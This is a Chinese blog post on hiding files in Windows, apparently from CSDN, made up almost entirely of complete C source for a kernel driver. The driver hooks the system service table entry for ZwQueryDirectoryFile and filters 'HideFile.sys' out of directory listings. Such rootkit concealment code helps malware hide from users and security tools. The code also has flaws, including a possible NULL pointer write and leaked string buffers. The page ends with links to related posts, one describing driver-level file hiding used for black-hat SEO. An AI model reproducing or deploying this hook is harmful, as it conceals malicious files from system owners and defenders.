文件隐藏(三)

最新推荐文章于 2023-06-12 09:12:38 发布
最新推荐文章于 2023-06-12 09:12:38 发布
阅读量745 收藏
点赞数
分类专栏: Windows 文章标签: integer hook function string descriptor file

Hook ZwQueryDirectoryFile实现文件隐藏


隐藏文件, 主要是SSDT HOOK ZwQueryDirectoryFile函数.

#include <ntddk.h>

 typedef BOOLEAN BOOL ;
 typedef unsigned long DWORD;
 typedef DWORD * PDWORD;
 typedef unsigned long ULONG;
 typedef unsigned short WORD;
 typedef unsigned char BYTE;

 #pragma pack(1)
 typedef struct ServiceDescriptorEntry {
 unsigned int *ServiceTableBase;
 unsigned int *ServiceCounterTableBase;
 unsigned int NumberOfServices;
 unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
 #pragma pack()

 __declspec (dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

 typedef struct _FILE_BOTH_DIR_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
ULONG EaSize;
CCHAR ShortNameLength;
WCHAR ShortName[12];
WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;


 // Our System Call Table
PVOID* NewSystemCallTable;

 // Our Memory Descriptor List
PMDL pMyMDL;

 #define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1)

 #define HOOK(functionName, newPointer2Function, oldPointer2Function ) \
oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], ( LONG ) newPointer2Function)

 #define UNHOOK(functionName, oldPointer2Function) \
InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], ( LONG ) oldPointer2Function)

NTSYSAPI
NTSTATUS
NTAPI ZwQueryDirectoryFile(
 IN HANDLE FileHandle,
 IN HANDLE Event OPTIONAL,
 IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
 IN PVOID ApcContext OPTIONAL,
 OUT PIO_STATUS_BLOCK IoStatusBlock,
 OUT PVOID FileInformation,
 IN ULONG Length,
 IN FILE_INFORMATION_CLASS FileInformationClass,
 IN BOOLEAN ReturnSingleEntry,
 IN PUNICODE_STRING FileName OPTIONAL,
 IN BOOLEAN RestartScan
);

 typedef NTSTATUS (*ZWQUERYDIRECTORYFILE)(
 IN HANDLE FileHandle,
 IN HANDLE Event OPTIONAL,
 IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
 IN PVOID ApcContext OPTIONAL,
 OUT PIO_STATUS_BLOCK IoStatusBlock,
 OUT PVOID FileInformation,
 IN ULONG Length,
 IN FILE_INFORMATION_CLASS FileInformationClass,
 IN BOOLEAN ReturnSingleEntry,
 IN PUNICODE_STRING FileName OPTIONAL,
 IN BOOLEAN RestartScan
);

ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile;

NTSTATUS NewZwQueryDirectoryFile(
 IN HANDLE FileHandle,
 IN HANDLE Event OPTIONAL,
 IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
 IN PVOID ApcContext OPTIONAL,
 OUT PIO_STATUS_BLOCK IoStatusBlock,
 OUT PVOID FileInformation,
 IN ULONG Length,
 IN FILE_INFORMATION_CLASS FileInformationClass,
 IN BOOLEAN ReturnSingleEntry,
 IN PUNICODE_STRING FileName OPTIONAL,
 IN BOOLEAN RestartScan
)
{
NTSTATUS status;
ANSI_STRING ansiFileName,ansiDirName,HideDirFile;
UNICODE_STRING uniFileName;

RtlInitAnsiString(&HideDirFile, "HideFile.sys" );
KdPrint(( "NewZwQueryDirectoryFile called." ));

status = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
Length,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan);

 //这部分是隐藏文件的核心部分
if ( NT_SUCCESS(status) && FileInformationClass == FileBothDirectoryInformation )
{
PFILE_BOTH_DIR_INFORMATION pFileInfo;
PFILE_BOTH_DIR_INFORMATION pLastFileInfo;
BOOLEAN bLastOne;

pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformation;
pLastFileInfo = NULL;

 do
{
bLastOne = !( pFileInfo->NextEntryOffset );
RtlInitUnicodeString(&uniFileName, pFileInfo->FileName);
RtlUnicodeStringToAnsiString(&ansiFileName, &uniFileName, TRUE);
RtlUnicodeStringToAnsiString(&ansiDirName, &uniFileName, TRUE);

KdPrint(( "Hide File: %Z\n" , &ansiFileName));

 if ( RtlCompareMemory(ansiFileName.Buffer, HideDirFile.Buffer, HideDirFile.Length ) == HideDirFile.Length)
{
 if (bLastOne)
{
pLastFileInfo->NextEntryOffset = 0;
 break ;
}
else //指针往后移动
{
 int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation;
 int iLeft = (DWORD)Length - iPos - pFileInfo->NextEntryOffset;
RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( ( char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft );
 continue ;
}
}

pLastFileInfo = pFileInfo;
pFileInfo = (PFILE_BOTH_DIR_INFORMATION)(( char *)pFileInfo + pFileInfo->NextEntryOffset);

} while (!bLastOne);

RtlFreeAnsiString(&ansiDirName);
RtlFreeAnsiString(&ansiFileName);
}

 return status;
}

NTSTATUS Hook( )
{
pMyMDL = MmCreateMdl( NULL,
KeServiceDescriptorTable.ServiceTableBase,
KeServiceDescriptorTable.NumberOfServices * 4 );

 if ( !pMyMDL )
 return ( STATUS_UNSUCCESSFUL );

MmBuildMdlForNonPagedPool( pMyMDL );
pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );

 if ( !NewSystemCallTable )
 return ( STATUS_UNSUCCESSFUL );

HOOK( ZwQueryDirectoryFile,NewZwQueryDirectoryFile ,OldZwQueryDirectoryFile);

 return ( STATUS_SUCCESS );
}

NTSTATUS UnHook( )
{
 if ( NewSystemCallTable )
{
UNHOOK( ZwQueryDirectoryFile, OldZwQueryDirectoryFile );
MmUnmapLockedPages( NewSystemCallTable, pMyMDL );
IoFreeMdl( pMyMDL );
}
 return ( STATUS_SUCCESS );
}

NTSTATUS OnUnload( IN PDRIVER_OBJECT DriverObject )
{
NTSTATUS status;
KdPrint(( "OnUnload called\n" ));
status = UnHook();
 return status;
}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject,

 IN PUNICODE_STRING theRegistryPath)

{
NTSTATUS status = STATUS_SUCCESS;

KdPrint(( "Enter DriverEntry!" ));

theDriverObject->DriverUnload = OnUnload;

Hook();

 return STATUS_SUCCESS;
}
anhkgg
关注
专栏目录
MAC中显示隐藏文件和不显示隐藏文件的方法(超简单)
08-28
除了终端命令外,还可以使用其他第方工具或系统偏好设置插件来控制隐藏文件的可见性,但这些方法相对复杂,对于一般用户来说,通过终端命令是最直接且简单的方式。 请注意,直接操作隐藏文件可能会对系统产生影响...
C#编程实现统计文件夹内文件隐藏文件的方法示例
08-30
C#编程实现统计文件夹内文件隐藏文件的方法示例 本文主要介绍了C#编程实现统计文件夹内文件隐藏文件的方法,结合具体实例形式分析了C#针对文件与目录的遍历及属性操作相关技巧。 一、C#中的文件和目录操作 在...
hook NtQueryDirectoryFile实现文件隐藏
diaoyo2388的博客
11-14 397
一、NtQueryDirectoryFile函数功能(NT系列函数) NtQueryDirectoryFile函数:在一个给定的文件句柄,该函数返回该文件句柄指定目录下的不同文件的各种信息。 根据传入的文件句柄参数fileHandle,返回句柄所表示的目录中的不同文件的信息。 NTSTATUS ZwQueryDirectoryFile( _In_HAND...
内核的枚举文件
qq_41071646的博客
01-13 914
这个还是糅合了 很多资料搞定的  感觉内核 枚举 文件还是简单的   核心函数就一个  ZwQueryDirectoryFile 得出来  _FILE_BOTH_DIR_INFORMATION  结构体 然后枚举 就可以了   然后 可以 封装两个函数   MyFindFirstFile  MyFindNextFile 。MyFindFirstFile  可以用 IoCreateFile 来获取...
驱动开发:内核遍历文件或目录
CSDN
06-12 9206
在笔者前一篇文章`《驱动开发:内核文件读写系列函数》`简单的介绍了内核中如何对文件进行基本的读写操作,本章我们将实现内核下遍历文件或目录这一功能,该功能的实现需要依赖于`ZwQueryDirectoryFile`这个内核API函数来实现,该函数可返回给定文件句柄指定的目录中文件的各种信息,此类信息会保存在`PFILE_BOTH_DIR_INFORMATION`结构下,通过遍历该目录即可获取到文件的详细参数,如下将具体分析并实现遍历目录功能。
ZwQueryDirectoryFile用法
weixin_34343308的博客
07-03 1294
1. 当返回值为STATUS_SUCCESS时,返回的字节数保存在IoStatusBlock.Information字段中; 2. 如果FileName字段被指定了,那么对于同时指定的FileHandle,那么所有后续的对于该FileHandle的调用,都要根据该FileName来过滤结果。 3. 如果ReturnSingleEntry指定为TRUE, 并且FileName指定为NULL,那么...
文件操作-->Tesla.Angela基础教程之枚举文件
zhuhuibeishadiao
04-02 972
搜索文件/文件函数例程 MyDriver.h #include #define dprintf if (DBG) DbgPrint #define DEVICE_NAME L"\\Device\\MyDriver" #define LINK_NAME L"\\DosDevices\\MyDriver" #define LINK_GLOBAL_NAME L"\\DosDev
驱动文件隐藏
qq_38807738的博客
06-25 2063
1、服务器使用文件查找hark.asp 未查找到文件。2、检测了第方js未发现hark.asp。3、检查了CSS等,未发现跳转代码。4、使用阿D及安全狗,未发现shell,安全狗发现挂马,但是是误报的。驱动级的文件隐藏来实现黑帽SEO的,有如下特征:系统目录存在如下文件:c:\WINDOWS\xlkfs.datc:\WINDOWS\xlkfs.dllc:\WINDOWS\xlkfs.inic:\...
tar 打包隐藏文件
清泉影月
08-03 5676
前言: 先说一下遇到的场景:前段时间在配合做 DevOps,组内有块代码是 php 的,需要用 tar 命令打包归档上传到 nexus 库,后来发现解压出来的包居然缺失了隐藏文件(配置文件),查了一下资料解决了,这里记录一下。 1. tar 命令常规用法 -c 创建新的档案文件 -C 指定到要解压到的目录。注意:该目录必须存在 -f 指定打包的文件名。在f之后要立即接打包文件名!不能再加参数! -x 解压 -O 将文件解压到标准输出 -p 使用原文件的原来属性 -P 创建归档文件,使用绝对路径 -t 列出档
搜索隐藏文件 海鸥搜索隐藏文件 v2.0
10-17
《海鸥搜索隐藏文件 v2.0:深度解析与应用指南》 在信息化时代,文件管理成为日常工作中不可或缺的一部分。特别是在Windows操作系统环境下,有时我们需要查找那些被设置为隐藏文件文件夹,以便进行系统维护或者...
ZwQueryDirectoryFile
10-25
ZwQueryDirectoryFile 参数对应的结构体。ZwQueryDirectoryFile 参数对应的结构体。ZwQueryDirectoryFile 参数对应的结构体。ZwQueryDirectoryFile 参数对应的结构体。
信息隐藏实验-在pdf文件隐藏信息
08-19
本实验报告旨在介绍信息隐藏技术在PDF文件中的应用,通过使用开源隐写工具wbStego4open,实现将文件隐藏到PDF文件中。下面是实验的详细介绍: 一、实验内容 本实验的目的是在PDF文件隐藏信息,将要隐藏文件...
使用find命令查找Linux中的隐藏文件的方法.docx
09-27
、查找隐藏文件夹 要查找隐藏文件夹,可以使用以下命令: find /要查找的文/件/夹/ -type d -iname .* -ls 这个命令将查找指定文件夹下的所有隐藏文件夹,包括以点号(.)开头的文件夹。 四、查找隐藏文件和...
FileStatus的主要方法的使用(源码)
Hao Ming
03-31 1743
关于FileStatus的使用主要是对文件和目录的状态查询,下面介绍了一些常用的FileStatus的方法 //返回文件的长度,如果是目录则返回0   public long getLen() {     return length;   }    //判断该对象是否为文件,如果是则返回为true   public boolean isFile() {     return !isd
hook ZwQueryDirectoryFile实现文件隐藏
如鹿渴慕泉水的专栏
05-10 1105
学习了网上《编写驱动拦截NT的API实现隐藏文件目录》这篇文章 参考这篇文章的代码 自己试着写了下 现发出来我调试成功的代码 给需要的朋友们 代码: #include "ntddk.h" typedef BOOLEAN BOOL; typedef unsigned long DWORD; typedef DWORD * PDWORD; typedef unsigned long ULONG;
hadoop_3_2_0-hdfs-journalnode-3.3.4-1.el7.x86_64.rpm
最新发布
09-16
Ambari+Bigtop 一站式编译和部署解决方案 https://gitee.com/tt-bigdata/ambari-env
window10文件隐藏源码
10-02
还有第种方法是使用专门的加密工具来隐藏文件源码。这些工具可以将文件源码加密成不可读的形式,并将其保存在指定的位置。只有在正确的密码或密钥被提供的情况下,才能解密和访问文件源码。 无论使用哪种方法,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值